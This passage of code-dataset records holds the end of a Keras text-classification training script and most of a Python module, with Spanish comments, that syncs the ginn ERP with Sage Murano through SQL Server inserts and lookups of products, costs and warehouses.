模型检查点,进行模型的数据进行保存;只保存最新f1的那次数据,只保存权重\n ]\n # 模型训练\n model.fit_generator(\n train_generator.forfit(),\n steps_per_epoch=len(train_generator),\n epochs=epochs,\n callbacks=callbacks,\n validation_data=valid_generator.forfit(),\n validation_steps=len(valid_generator)\n )\n\n del model # 删除模型\n K.clear_session() # 清理 会话\n\n\nif __name__ == '__main__':\n df_train = pd.read_csv('dataset/all_label_id_data.csv', encoding='utf-8')\n df_train['content'] = df_train['content'].apply(lambda x: x.strip().split())\n\n do_train(df_train)\n","repo_name":"xhjcxxl/ccf2020_classification","sub_path":"keras_model/train_classification.py","file_name":"train_classification.py","file_ext":"py","file_size_in_byte":14366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9811113701","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nOperaciones.\n\n\"\"\"\n\n# TODO: No sincroniza el campo que indica que el geotextil es C en los\n# productos de venta de tipo Geotextil.\n\n# pylint: disable=too-many-lines, wrong-import-position\n# pylint: relative-import\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport time\nimport logging\nfrom collections import defaultdict, namedtuple\nfrom tempfile import gettempdir\n\nNOMFLOG = \".\".join(os.path.basename(__file__).split(\".\")[:-1])\ntry:\n logging.basicConfig(filename=\"%s.log\" % (NOMFLOG),\n format=\"%(asctime)s %(levelname)-8s : %(message)s\",\n level=logging.DEBUG)\n# pylint:disable=bare-except\nexcept: # Error de permisos. 
Fallback a temporal # noqa\n NOMFLOG = os.path.join(gettempdir(), \"ops.tmp\")\n logging.basicConfig(filename=\"{}{}.log\".format(NOMFLOG, time.time()),\n format=\"%(asctime)s %(levelname)-8s : %(message)s\",\n level=logging.DEBUG)\n\nimport datetime # noqa\nfrom connection import Connection, DEBUG, VERBOSE, CODEMPRESA, CANALES # noqa\nfrom connection import FABRICACION, ENTRADA, SALIDA, INVENTARIO, VENTA # noqa\nfrom export import determinar_familia_murano # noqa\nfrom extra import get_peso_bruto, get_peso_neto, get_superficie # noqa\nfrom extra import AttrDict # noqa\n\ntry:\n import win32com.client\nexcept ImportError:\n LCOEM = False\nelse:\n LCOEM = True\n\nRUTA_GINN = os.path.abspath(os.path.join(\n os.path.dirname(__file__), \"..\", \"..\", \"..\", \"ginn\"))\nsys.path.append(RUTA_GINN)\nfrom framework import pclases # pylint: disable=import-error # noqa\n\n\n# DocumentoUnico a «No» para evitar error con decimales.\nSQL_STOCK = \"\"\"INSERT INTO [%s].[dbo].[TmpIME_MovimientoStock](\n CodigoEmpresa,\n Ejercicio,\n Periodo,\n Fecha,\n Serie,\n Documento,\n CodigoArticulo,\n CodigoAlmacen,\n -- AlmacenContrapartida,\n Partida,\n -- Partida2_,\n -- CodigoColor_,\n GrupoTalla_,\n CodigoTalla01_,\n TipoMovimiento,\n Unidades,\n UnidadMedida1_,\n Precio,\n Importe,\n Unidades2_,\n UnidadMedida2_,\n FactorConversion_,\n Comentario,\n CodigoCanal,\n -- CodigoCliente,\n -- CodigoProveedor,\n -- FechaCaduca,\n Ubicacion,\n OrigenMovimiento,\n -- EmpresaOrigen,\n -- MovOrigen,\n -- EjercicioDocumento,\n NumeroSerieLc,\n IdProcesoIME,\n -- MovIdentificadorIME,\n StatusTraspasadoIME,\n TipoImportacionIME,\n DocumentoUnico,\n -- FechaRegistro,\n MovPosicion\n )\n VALUES (\n %d, -- código empresa\n %d, -- ejercicio\n %d, -- periodo\n '%s', -- fecha\n '%s', -- serie ('FAB'|'API')\n %d, -- documento\n '%s', -- codigo_articulo\n '%s', -- codigo_almacen\n -- '',\n '%s', -- partida\n -- NULL,\n -- NULL,\n %d, -- grupo_talla\n '%s', -- codigo_talla\n %d, -- tipo_movimiento\n %f, -- unidades en la unidad de medida específica (m², kg)\n '%s', -- unidad de medida específica\n %f, -- precio\n %f, -- importe\n %f, -- unidades2 = unidades * factor de conversion | fc!=0\n '%s', -- UnidadMedida2_ (la básica: ROLLO, BALA...)\n %f, -- factor de conversión\n '%s', -- comentario\n '%s', -- Canal. Antes DIV para evitar un bug de Murano.\n -- NULL,\n -- NULL,\n -- NULL,\n '%s', -- ubicación\n '%s', -- origen movimiento\n -- NULL,\n -- NULL,\n -- NULL,\n '%s', -- NumeroSerieLc\n '%s', -- IdProcesoIME\n -- NULL,\n 0,\n 0,\n 0,\n -- NULL,\n '%s' -- GUID MovPosicion\n );\"\"\" # NOQA\n\nSQL_SERIE = \"\"\"INSERT INTO [%s].[dbo].[TmpIME_MovimientoSerie](\n CodigoEmpresa,\n CodigoArticulo,\n NumeroSerieLc,\n Fecha,\n OrigenDocumento,\n EjercicioDocumento,\n SerieDocumento,\n Documento,\n MovPosicionOrigen,\n -- CodigoColor_,\n CodigoTalla01_,\n CodigoAlmacen,\n Ubicacion,\n Partida,\n UnidadMedida1_,\n UnidadesSerie,\n -- NumeroSerieFabricante,\n -- EmpresaOrigen,\n -- CodigoCliente,\n -- CodigoProveedor,\n Comentario,\n IdProcesoIME,\n --MovIdentificadorIME,\n StatusTraspasadoIME,\n TipoImportacionIME,\n PesoBruto_,\n PesoNeto_,\n MetrosCuadrados,\n CodigoPale)\n VALUES (\n %d, -- código empresa\n '%s', -- código artículo\n '%s', -- número de serie del artículo\n '%s', -- fecha\n %d, -- origen documento\n %d, -- ejercicio\n '%s', -- serie ('FAB'|'API')\n %d, -- documento\n '%s', -- mov. 
posición origen\n -- NULL,\n '%s', -- código talla\n '%s', -- código almacén\n '%s', -- ubicación\n '%s', -- partida\n '%s', -- unidad de medida básica (ROLLO, BALA...)\n -- NO la específica (kg, m²)\n 1,\n -- NULL,\n -- NULL,\n -- NULL,\n -- NULL,\n '%s', -- comentario\n '%s', -- ID proceso IME\n -- NULL,\n 0,\n 0,\n %f, -- peso bruto\n %f, -- peso neto\n %s, -- metros cuadrados\n '%s' -- código de palé\n );\"\"\"\n\n\ndef buscar_grupo_talla(producto_venta):\n \"\"\"\n Devuelve el código de grupo de tallas (calidades) que puede tener el\n producto.\n \"\"\"\n # Hemos varios grupos de talla: 1 para A, B y C, 2 para A, B (sin C), etc.\n grupo_talla = 0 # Sin grupo de talla\n # res = consultar_producto(nombre = productoVenta.descripcion)\n res = consultar_producto(producto_venta)\n try:\n grupo_talla = res[0]['GrupoTalla_']\n except TypeError as exception:\n strlog = \"(EE)[T] %s no se encuentra en Murano.\" % (\n producto_venta.descripcion)\n print(strlog)\n logging.error(strlog)\n if not DEBUG:\n raise exception\n grupo_talla = 0\n return grupo_talla\n\n\n# pylint: disable=too-many-branches\ndef buscar_unidad_medida_basica(producto, articulo=None):\n \"\"\"\n Devuelve la unidad de medida básica de la ficha de murano para el\n producto indicado. Devuelve \"\" si el producto no lleva tratamiento de\n serie, porque en ese caso el registro de movimiento de stock solo debe\n llevar una unidad. Y esta función se usa para determinar la segunda.\n\n ***\n\n OBSOLETO:\n ---------\n Devuelve la unidad de medida básica según el tipo de producto en ginn.\n Si el producto es un producto de compra o de venta pero sin trazabilidad\n (como ocurre con la granza reciclada, por ejemplo), devuelve la cadena\n vacía como unidad2, ya que en esos movimientos -Sage dixit- el campo\n UnidadMedida2_ debe quedar vacío.\n Si se especifica un artículo, la unidad de éste (BALA, ROLLO, BIGBAG...)\n prevalece sobre la general del producto. Útil para productos que pueden\n empaquetarse tanto en balas como en bigbags.\n \"\"\"\n # Al principio me dijo Félix que la buscara en Murano, pero no lo hago por\n # dos motivos:\n # 1.- Puede que la unidad básica en mirano sea la BALA pero estemos\n # mandando un BIGBAG de ese producto.\n # 2.- Por optimización. Cada consulta al MS-SQLServer tarda más que\n # cualquier operación compleja contra PostgreSQL. Y CONSUME LICENCIA.\n unidad2 = \"\"\n if articulo:\n if articulo.es_bala():\n unidad2 = \"BALA\"\n elif articulo.es_bala_cable():\n unidad2 = \"BALA\"\n elif articulo.es_rollo():\n unidad2 = \"ROLLO\"\n elif articulo.es_rollo_defectuoso():\n unidad2 = \"ROLLO\"\n elif articulo.es_rollo_c():\n unidad2 = \"ROLLO\"\n elif articulo.es_bigbag():\n unidad2 = \"BIGBAG\"\n elif articulo.es_caja():\n unidad2 = \"CAJA\"\n if not unidad2: # Si no artículo o por artículo no se encontró nada.\n if isinstance(producto, pclases.ProductoVenta):\n if producto.es_bala() or producto.es_bala_cable():\n unidad2 = \"BALA\"\n elif producto.es_rollo() or producto.es_rollo_c():\n unidad2 = \"ROLLO\"\n elif producto.es_bigbag():\n unidad2 = \"BIGBAG\"\n elif producto.es_caja() or producto.es_bolsa():\n unidad2 = \"CAJA\"\n else:\n # es_especial, es_granza o algo así. No lleva unidad2 en Murano\n strlog = \"(EE)[U] UnidadMedida2_ para «%s» (%s) indeterminada\"\\\n \".\" % (producto.descripcion, producto.puid)\n logging.error(strlog)\n unidad2 = \"\"\n # raise ValueError, strlog\n else: # Es producto de compra. 
La unidad2 no debe informarse.\n unidad2 = \"\"\n return unidad2\n\n\n# pylint: disable=invalid-name\ndef buscar_unidad_medida_basica_murano(producto):\n \"\"\"\n Devuelve la unidad de medida básica de la ficha del producto.\n \"\"\"\n res = consultar_producto(producto)\n try:\n unidad2 = res[0]['UnidadMedida2_']\n except TypeError as exception:\n strlog = \"(EE)[U] UnidadMedida2_ para %s no se encuentra en Murano\"\\\n \".\" % (producto.descripcion)\n print(strlog)\n logging.error(strlog)\n if not DEBUG:\n raise exception\n unidad2 = \"ROLLO|BALA|BIGBAG|CAJA\"\n return unidad2\n\n\ndef buscar_marcado_ce(producto):\n \"\"\"\n Devuelve los valores de marcado CE para el producto recibido.\n Se devuelve como un diccionario de nombre de campo y valor.\n \"\"\"\n id_murano = buscar_codigo_producto(producto)\n if not id_murano:\n strerror = \"El producto [{}] {} no existe en Murano.\".format(\n producto.puid, producto.descripcion)\n logging.error(strerror)\n res = None\n else:\n c = Connection() # pylint: disable=no-value-for-parameter\n try:\n # pylint: disable=no-member\n sql = \"SELECT * FROM %s.dbo.GEO_ArticulosMarcado\"\\\n \" WHERE \" % (c.get_database())\n where = r\"CodigoArticulo = '%s';\" % (id_murano)\n sql += where\n res = c.run_sql(sql)\n record = res[0] # NOQA\n except IndexError:\n strerror = \"El producto [{}] {} no tiene registro de marcado en \"\\\n \"Murano.\".format(producto.puid, producto.descripcion)\n res = None\n else:\n res = desmuranize_valor(record)\n return res\n\n\ndef desmuranize_valor(record):\n \"\"\"\n Al objeto recibido le convierte los nombres de los atributos al\n equivalente en ginn.\n \"\"\"\n record_murano = {}\n for clave in record.keys():\n if clave not in (\"CodigoEmpresa\", \"CodigoArticulo\"):\n clave_ginn = field_murano2ginn(clave)\n if \".\" in clave_ginn: # tabla_realcionada.campo. Me quedo solo\n # con el campo.\n clave_ginn = clave_ginn.split(\".\")[-1]\n record_murano[clave_ginn] = record[clave]\n RecordMurano = namedtuple('RecordMurano', record_murano.keys())\n res = RecordMurano(**record_murano)\n return res\n\n\ndef field_murano2ginn(campo):\n \"\"\"\n Devuelve el nombre del campo equivalente en productos de ginn al de Murano\n recibido. Si no tiene equivalencia devuelve None.\n Devuelve el nombre_de_la_tabla.campo. 
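\n\n    Un boceto de uso, tomando un campo real del mapeo de abajo:\n\n        >>> field_murano2ginn('GEO_gramos')\n        'camposEspecificosRollo.gramos'\n\n    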
Si el campo en la tabla de Murano se\n puede corresponder con varios de ginn, se devuelve así:\n nombre_tabla1/nombre_tabla2.campo_ginn\n (el campo_ginn se supone que se llama igual en las dos tablas)\n SHOW ME THE CODE!\n \"\"\"\n # De momento solo lo necesito para los campos de Marcado CE.\n switcher = {\n 'GEO_est_por_gramaje': 'camposEspecificosRollo.estandarPruebaGramaje',\n 'GEO_est_pr_alar_long':\n 'camposEspecificosRollo.estandarPruebaAlargamientoLongitudinal',\n 'GEO_est_pr_alar_trans':\n 'camposEspecificosRollo.estandarPruebaAlargamientoTransversal',\n 'GEO_est_pr_compresion':\n 'camposEspecificosRollo.estandarPruebaCompresion',\n 'GEO_est_pr_espesor': 'camposEspecificosRollo.estandarPruebaEspesor',\n 'GEO_est_pr_long': 'camposEspecificosRollo.estandarPruebaLongitudinal',\n 'GEO_est_pr_perforacion':\n 'camposEspecificosRollo.estandarPruebaPerforacion',\n 'GEO_est_pr_permeabilidad':\n 'camposEspecificosRollo.estandarPruebaPermeabilidad',\n 'GEO_est_pr_piramidal':\n 'camposEspecificosRollo.estandarPruebaPiramidal',\n 'GEO_est_pr_poros': 'camposEspecificosRollo.estandarPruebaPoros',\n 'GEO_est_pr_trans': 'camposEspecificosRollo.estandarPruebaTransversal',\n 'GEO_tol_por_gramaje':\n 'camposEspecificosRollo.toleranciaPruebaGramaje',\n 'GEO_tol_por_gramaje_sup':\n 'camposEspecificosRollo.toleranciaPruebaGramajeSup',\n 'GEO_tot_pr_alar_long':\n 'camposEspecificosRollo.toleranciaPruebaAlargamientoLongitudinal',\n 'GEO_tot_pr_alar_long_sup':\n 'toleranciaPruebaAlargamientoLongitudinalSup',\n 'GEO_tot_pr_alar_trans':\n 'camposEspecificosRollo.toleranciaPruebaAlargamientoTransversal',\n 'GEO_tot_pr_alar_trans_sup':\n 'toleranciaPruebaAlargamientoTransversalSup',\n 'GEO_tot_pr_compresion':\n 'camposEspecificosRollo.toleranciaPruebaCompresion',\n 'GEO_tot_pr_compresion_sup':\n 'camposEspecificosRollo.toleranciaPruebaCompresionSup',\n 'GEO_tot_pr_espesor': 'camposEspecificosRollo.toleranciaPruebaEspesor',\n 'GEO_tot_pr_espesor_sup':\n 'camposEspecificosRollo.toleranciaPruebaEspesorSup',\n 'GEO_tot_pr_long':\n 'camposEspecificosRollo.toleranciaPruebaLongitudinal',\n 'GEO_tot_pr_long_sup':\n 'camposEspecificosRollo.toleranciaPruebaLongitudinalSup',\n 'GEO_tot_pr_perforacion':\n 'camposEspecificosRollo.toleranciaPruebaPerforacion',\n 'GEO_tot_pr_perforacion_sup':\n 'camposEspecificosRollo.toleranciaPruebaPerforacionSup',\n 'GEO_tot_pr_permeabilidad':\n 'camposEspecificosRollo.toleranciaPruebaPermeabilidad',\n 'GEO_tot_pr_permeabilidad_sup':\n 'camposEspecificosRollo.toleranciaPruebaPermeabilidadSup',\n 'GEO_tot_pr_piramidal':\n 'camposEspecificosRollo.toleranciaPruebaPiramidal',\n 'GEO_tot_pr_piramidal_sup':\n 'camposEspecificosRollo.toleranciaPruebaPiramidalSup',\n 'GEO_tot_pr_poros': 'camposEspecificosRollo.toleranciaPruebaPoros',\n 'GEO_tot_pr_poros_sup':\n 'camposEspecificosRollo.toleranciaPruebaPorosSup',\n 'GEO_tot_pr_trans':\n 'camposEspecificosRollo.toleranciaPruebaTransversal',\n 'GEO_tot_pr_trans_sup':\n 'camposEspecificosRollo.toleranciaPruebaTransversalSup',\n # -- Campos generales en común. 
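(p. ej. 'DescripcionArticulo' -> 'nombre'). 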
Algunos son funciones que reciben el\n # valor de Murano y devuelvel el correspondiente en ginn\n 'DescripcionLinea': _get_linea_produccion_ginn,\n 'DescripcionArticulo': 'nombre',\n 'Descripcion2Articulo': 'descripcion',\n 'CodigoAlternativo': 'codigo',\n 'StockMinimo': 'minimo',\n 'PrecioVenta': 'preciopordefecto',\n 'CodigoArancelario': 'arancel',\n 'GEO_ProdEstandar': 'prodestandar',\n 'GEO_anno_certificacion': 'annoCertificacion',\n 'GEO_Dni': 'dni',\n 'GEO_Usi': _get_uso_ginn,\n 'ObsoletoLc': 'obsoleto',\n # -- Campos específicos de rollos\n 'GEO_gramos': 'camposEspecificosRollo.gramos',\n 'GEO_rollos_por_camion': 'camposEspecificosRollo.rollosPorCamion',\n 'GEO_Modelo_etiqueta_id': _get_modelo_etiqueta_ginn,\n # 'camposEspecificosRollo.modeloEtiquetaID',\n 'GEO_Diametro': 'camposEspecificosRollo.diametro',\n 'GEO_Ficha_fabricacion': 'camposEspecificosRollo.fichaFabricacion',\n 'MarcaProducto': 'camposEspecificosRollo.codigoComposan',\n 'GEO_ancho': 'camposEspecificosRollo.ancho',\n 'GEO_metros_lineales': 'camposEspecificosRollo.metrosLineales',\n 'GEO_calidad_C': 'camposEspecificosRollo.c',\n 'GEO_peso_embalaje': 'camposEspecificosRollo.pesoEmbalaje',\n 'GEO_Cliente_id':\n 'camposEspecificosRollo/camposEspecificosBala.clienteID',\n # Campos específicos de fibra:\n 'GEO_Consumo_granza': 'camposEspecificosBala.consumoGranza',\n 'GEO_Tipo_Material_bala_id': _get_tipo_material_bala_ginn,\n 'GEO_bolsas_Caja': 'camposEspecificosBala.bolsasCaja',\n 'GEO_gramos_bolsa': 'camposEspecificosBala.gramosBolsa',\n 'GEO_Reciclada': 'camposEspecificosBala.reciclada',\n 'GEO_Color': 'camposEspecificosBala.color',\n 'GEO_Cajas_pale': 'camposEspecificosBala.cajasPale',\n # 'GEO_Cliente_id': 'camposEspecificosBala.clienteID', # DUPE\n 'GEO_Dtex': 'camposEspecificosBala.dtex',\n 'GEO_Corte': 'camposEspecificosBala.corte',\n 'GEO_antiuvi': 'camposEspecificosBala.antiuv',\n }\n return switcher.get(campo, None)\n\n\ndef _get_tipo_material_bala_ginn(codigo_murano):\n \"\"\"\n Devuelve el ID del tipo de material de fibra según el código recibido\n de Murano:\n - '': None\n - 'PR': 1 (Polipropileno)\n - 'LI': 2 (Poliéster)\n \"\"\"\n # HARCODED\n if codigo_murano == 'PR':\n # Por error en Sage, lo teclearon como Prolipopileno\n res = 1\n elif codigo_murano == 'LI':\n res = 2\n else:\n res = None\n if res:\n res = pclases.TipoMaterialBala.get(res)\n return res\n\n\ndef _get_modelo_etiqueta_ginn(id_etiqueta_murano):\n \"\"\"\n Devuelve el ID del modelo de la etiqueta en ginn correspondiente al ID\n de Murano para ese mismo modelo recibido.\n Si no lo encuentra o no está establecido en Murano (0), devuelve None.\n \"\"\"\n # TODO: Debería mirar los campos módulo y función de Murano y dejar todo\n # este lío de mantener las tablas con ID idéntico entre ambos programas.\n # Ya en Murano tienen una tabla con (id, nombre, modelo, función). Esta\n # función debe convertirse en un \"sincronizar\" las dos tablas o bien\n # sincronizar el registro en cuestión trayéndose modelo y función. Quizás\n # lo primero. Tengo que \"echarle una pensada\".\n if id_etiqueta_murano == 4:\n # Normativa julio 2013\n res = 4\n elif id_etiqueta_murano in range(1, 99): # Hasta 99 modelos. 
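(en la práctica, 1-98). 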
Cambiable.\n # Resulta que el ID coincide en ambas bases de datos.\n res = id_etiqueta_murano\n else: # Incluido el 0, que es el equivalente al None en Murano\n res = None\n if res:\n res = pclases.ModeloEtiqueta.get(res)\n else:\n # Valor por defecto\n res = pclases.ModeloEtiqueta.get_default()\n return res\n\n\ndef _get_uso_ginn(codigo_uso):\n \"\"\"\n Si recibe, devuelve:\n - DP: Drenaje, filtración, refuerzo, separación, protección\n - DS: Drenaje, filtración, refuerzo, separación\n - FP: Fibra de polipropileno virgen embolsada en papel hidrosoluble para\n su uso como aditivo del hormigón\n - FV: Fibra de polipropileno virgen\n - FS: Filtración, separación\n - FR: Filtración, separación, protección\n - '': ''\n Resto: None\n \"\"\"\n if codigo_uso == 'DP':\n res = \"Drenaje, filtración, refuerzo, separación, protección\"\n elif codigo_uso == 'DS':\n res = \"Drenaje, filtración, refuerzo, separación\"\n elif codigo_uso == 'FP':\n res = \"Fibra de polipropileno virgen embolsada en papel hidrosoluble\"\\\n \" para su uso como aditivo del hormigón\"\n elif codigo_uso == 'FV':\n res = \"Fibra de polipropileno virgen\"\n elif codigo_uso == 'FS':\n res = \"Filtración, separación\"\n elif codigo_uso == 'FR':\n res = \"Filtración, separación, protección\"\n elif codigo_uso == '':\n res = \"\"\n else:\n res = None\n return res\n\n\ndef _get_linea_produccion_ginn(descripcion_linea):\n \"\"\"\n Devuelve el registro de ginn que se corresponde con la descripción de la\n línea de producción de Murano recibida.\n \"\"\"\n try:\n linea = descripcion_linea.split()[-1]\n if linea.endswith(\"s\"):\n linea = linea[:-1]\n if linea.lower() == \"geocem\":\n # Problema entre el teclado y la silla. A veces se confunden...\n linea = \"embolsado\"\n except AttributeError:\n # Es un producto de venta especial. Sin línea de producción.\n linea = None\n try:\n # pylint: disable=no-member\n lineas_ginn = pclases.LineaDeProduccion.select(\n pclases.LineaDeProduccion.q.nombre.contains(linea))\n assert lineas_ginn.count() == 1\n linea_ginn = lineas_ginn[0]\n except IndexError:\n linea_ginn = None\n except AssertionError:\n logging.warning(\"Encontradas %d posibles líneas de producción para %s\",\n lineas_ginn.count(), descripcion_linea)\n linea_ginn = lineas_ginn[0]\n return linea_ginn\n\n\ndef buscar_codigo_producto(producto_venta):\n \"\"\"\n Busca el ID del producto en Murano para la descripción del producto\n recibido.\n \"\"\"\n # Se puede dar el caso de que el producto exista pero la descripción no\n # coincida completamente porque Murano ha recortado el texto para que\n # quepa en su mierda de campo tipo CHAR[40]. ¿En serio? 2016 bro!\n # Buscamos directamente por el código de murano_exportar: [PC|PV]+ID\n # Podría aquí devolverlo directamente, pero al menos así me aseguro de\n # que existe en Murano.\n # res = consultar_producto(nombre = productoVenta.descripcion)\n res = consultar_producto(producto=producto_venta)\n try:\n codarticulo = res[0]['CodigoArticulo']\n desc_ginn = producto_venta.descripcion\n assert (desc_ginn.startswith(res[0]['DescripcionArticulo']) or\n desc_ginn.startswith(res[0]['Descripcion2Articulo']))\n except (IndexError, TypeError) as exception:\n strlog = \"(EE)[C] %s no se encuentra en Murano. 
Excepción: %s\" % (\n producto_venta.descripcion, exception)\n print(strlog)\n logging.error(strlog)\n if not DEBUG:\n raise exception\n else:\n codarticulo = ''\n except AssertionError:\n strlog = '(WW)[C] La descripción de \"%s\" (%s) ha cambiado.'\\\n ' En Murano es: \"%s\"/\"%s\"' % (producto_venta.descripcion,\n producto_venta.puid,\n res[0]['DescripcionArticulo'],\n res[0]['Descripcion2Articulo'])\n try:\n print(strlog)\n except IOError: # pythonw. No estoy conectado a un terminal.\n pass\n logging.warning(strlog)\n return codarticulo\n\n\ndef buscar_precio_coste(producto, ejercicio, codigo_almacen):\n \"\"\"\n Devuelve el importe en €/kg definido en Murano y después en ginn (si no se\n encuenta) para la familia del producto.\n Si es producto de compra, devuelve el precio de valoracion por unidad de\n producto según la función de valoración definida para él.\n \"\"\"\n cod_familia = determinar_familia_murano(producto)\n if isinstance(producto, pclases.ProductoVenta):\n try:\n precio_coste = buscar_precio_coste_familia_murano(cod_familia)\n except ValueError:\n precio_coste = buscar_precio_coste_familia_ginn(cod_familia)\n elif isinstance(producto, pclases.ProductoCompra):\n try:\n precio_coste = buscar_precio_coste_murano(producto, ejercicio,\n codigo_almacen)\n except ValueError:\n precio_coste = buscar_precio_coste_ginn(producto)\n else:\n # WTF?\n raise ValueError(\"ops:buscar_precio_coste: el producto «%s» recibido\"\n \" no es un producto de compra ni de venta.\"\n % (producto))\n try:\n precio_coste = float(precio_coste) # Viene como Decimal\n except TypeError: # No tiene precio de coste en ningún sitio.\n precio_coste = 0.0\n return precio_coste\n\n\ndef buscar_precio_coste_familia_murano(cod_familia):\n \"\"\"\n Devuelve el precio de coste de la base de datos de Murano para el código\n de familia recibido.\n Lanza ValueError si el código de familia no se encuentra o no tiene\n precio de coste.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n # SQL = r\"\"\"SELECT TOP 1 PrecioPorUnidadEspecifica\n # FROM [%s].[dbo].[Familias]\n # WHERE CodigoFamilia = '%s'\n # AND CodigoSubfamilia = '***********'\n # AND CodigoEmpresa = '%d';\n # \"\"\" % (c.get_database(),\n # cod_familia,\n # CODEMPRESA)\n SQL = r\"\"\"SELECT TOP 1 GEO_CosteUnidadEspecifica\n FROM [%s].[dbo].[Familias]\n WHERE CodigoFamilia = '%s'\n AND CodigoSubfamilia = '**********'\n AND CodigoEmpresa = '%d';\n \"\"\" % (c.get_database(),\n cod_familia,\n CODEMPRESA)\n try:\n precio_coste = c.run_sql(SQL)[0][\"GEO_CosteUnidadEspecifica\"]\n except (TypeError, AttributeError, KeyError):\n # cod_familia es None o no se encontraron registros\n raise ValueError\n except Exception as exception: # pylint: disable=broad-except\n logging.warning(\"No se encontró precio en Murano para la familia \"\n \"«%s». Además, provocó una excepción %s.\",\n cod_familia, exception)\n precio_coste = None\n return precio_coste\n\n\ndef buscar_precio_coste_familia_ginn(cod_familia):\n \"\"\"\n Devuelve el precio por familia definido en ginn.\n \"\"\"\n # HARCODED: Esto debeía ir en la tabla de ginn correspondiente\n # y reflejarlo en la ventana que sea (no hay ventana de familias).\n # En teoría no haría falta ya que siempre van a venir de Murano.\n if cod_familia == \"GEO\":\n precio_coste = 2.210\n elif cod_familia == \"FIB\" or cod_familia == \"FCE\":\n precio_coste = 1.545\n elif cod_familia == \"FEM\":\n precio_coste = 1.884\n else:\n raise ValueError(\"cod_familia debe ser GEO, FIB, FCE o FEM. 
Se \"\n \"recibió: %s\" % (cod_familia))\n return precio_coste\n\n\ndef buscar_precio_coste_murano(producto, ejercicio, codigo_almacen):\n \"\"\"\n Devuelve el precio de coste de la base de datos de Murano para el producto\n recibido. Según Sage lo aconsejable es enviar el «PrecioMedio» en el\n momento del consumo del producto. Se almacena en el campo «PrecioMedio»\n de la tabla «AcumuladoStock», donde solo hay un registro por producto,\n año y periodo. El periodo 99 siempre guarda el más actualizado.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n cod_articulo = get_codigo_articulo_murano(producto)\n SQL = r\"\"\"SELECT TOP 1 PrecioMedio\n FROM [%s].[dbo].[AcumuladoStock]\n WHERE CodigoArticulo = '%s'\n AND Ejercicio = %d\n AND CodigoAlmacen = '%s'\n AND CodigoEmpresa = '%d'\n AND Periodo = 99;\n \"\"\" % (c.get_database(),\n cod_articulo,\n ejercicio,\n codigo_almacen,\n CODEMPRESA)\n try:\n precio_coste = c.run_sql(SQL)[0][\"PrecioMedio\"]\n except (TypeError, AttributeError, KeyError, IndexError):\n # codalmacen es None o no se encontraron registros\n raise ValueError\n except Exception as exception: # pylint: disable=broad-except\n logging.warning(\"No se encontró precio medio en Murano para el \"\n \"producto «%s». Además, provocó una excepción %s.\",\n cod_articulo, exception)\n precio_coste = None\n return precio_coste\n\n\ndef buscar_precio_coste_ginn(producto):\n \"\"\"\n Devuelve el precio de coste en ginn para el producto (debe ser un producto\n de compra) según su función de valoración.\n \"\"\"\n if isinstance(producto, pclases.ProductoCompra):\n precio_coste = producto.get_precio_valoracion()\n elif isinstance(producto, pclases.ProductoVenta):\n # No debería entrar aquí, pero me estoy adelantando al futuro right now\n cod_familia = determinar_familia_murano(producto)\n precio_coste = buscar_precio_coste_familia_ginn(cod_familia)\n else:\n # WTF?\n raise ValueError(\"ops:buscar_precio_coste_ginn: el producto «%s» \"\n \"recibido no es un producto de compra ni de venta.\"\n % (producto))\n return precio_coste\n\n\ndef buscar_codigo_almacen(almacen, articulo=None):\n \"\"\"\n Devuelve almacén de la empresa configurada cuyo nombre coincida con el del\n almacén de ginn recibido.\n Si el almacén recibido es None, entonces buscará el almacén actual donde\n dice Murano que está el artículo recibido como segundo parámetro.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n if almacen:\n filas = c.run_sql(\"\"\"SELECT CodigoAlmacen\n FROM %s.dbo.Almacenes\n WHERE CodigoEmpresa = %d AND Almacen = '%s'\n ORDER BY CodigoAlmacen;\"\"\" % (c.get_database(),\n CODEMPRESA,\n almacen.nombre))\n try:\n codalmacen = filas[0]['CodigoAlmacen']\n except Exception as exception: # pylint: disable=broad-except\n strlog = \"(EE)[A] Almacén '%s' no se encuentra en Murano.\" % (\n almacen.nombre)\n print(strlog)\n logging.error(strlog)\n if not DEBUG:\n raise exception\n else:\n return 'CEN'\n else:\n if DEBUG:\n return 'CEN'\n else:\n try:\n assert articulo is not None\n codalmacen = get_codalmacen_articulo(c, articulo)\n except AssertionError:\n raise ValueError(\"(EE)[A] Debe especificarse un almacén \"\n \"o un artículo.\")\n return codalmacen\n\n\ndef simulate_guid():\n \"\"\"\n Genera un código aleatorio similar al generado por MSSQLServer.\n \"\"\"\n if VERBOSE and DEBUG:\n strlog = \"Simulando guid...\"\n print(strlog)\n logging.info(strlog)\n import random\n grupos = 8, 4, 4, 4, 12\n subgrupos = []\n for g in grupos:\n subgrupo 
= \"\"\n for i in range(g): # pylint: disable=unused-variable\n c = random.choice(\"01234567890ABCDE\")\n subgrupo += c\n subgrupos.append(subgrupo)\n guid = \"-\".join(subgrupos)\n if VERBOSE and DEBUG:\n strlog = guid\n print(strlog)\n logging.info(strlog)\n return guid\n\n\ndef buscar_factor_conversion(producto):\n \"\"\"\n Busca el factor de conversión en la tabla de productos de Murano a partir\n del producto de compra o de venta recibido.\n # Por norma general hay que poner 0 en los productos que tengan factor de\n # conversión (traslación directa entre las unidades básicas --bultos-- y\n # las específicas --KG, M2--) y 1 en los que el peso varíe entre cada\n # artículo del mismo producto.\n \"\"\"\n # Balas A, B y C: 0\n # Bigbags: 0\n # Rollos A y B: 0\n # En rollos C: 1\n # En cajas, que todas pesan iguales: 1. Los palés no hay que crearlos, se\n # crean solos al meter las cajas.\n if isinstance(producto, pclases.ProductoVenta):\n if producto.es_clase_c():\n factor_conversion = 1\n else:\n factor_conversion = 0\n else:\n factor_conversion = 1\n return factor_conversion\n\n\ndef generar_guid(conexion):\n \"\"\"\n Devuelve un GUID de SQLServer o simula uno en modo depuración.\n \"\"\"\n try:\n guid = conexion.run_sql(\"SELECT NEWID() AS guid;\")[0]['guid']\n except Exception as exception: # pylint: disable=broad-except\n if not DEBUG:\n raise exception\n else:\n guid = simulate_guid()\n return guid\n\n\ndef get_mov_posicion(conexion, codigo_articulo):\n \"\"\"\n Devuelve el GUID del movimiento de stock asociado al movimiento de número\n de serie. Si el número de serie (el código de 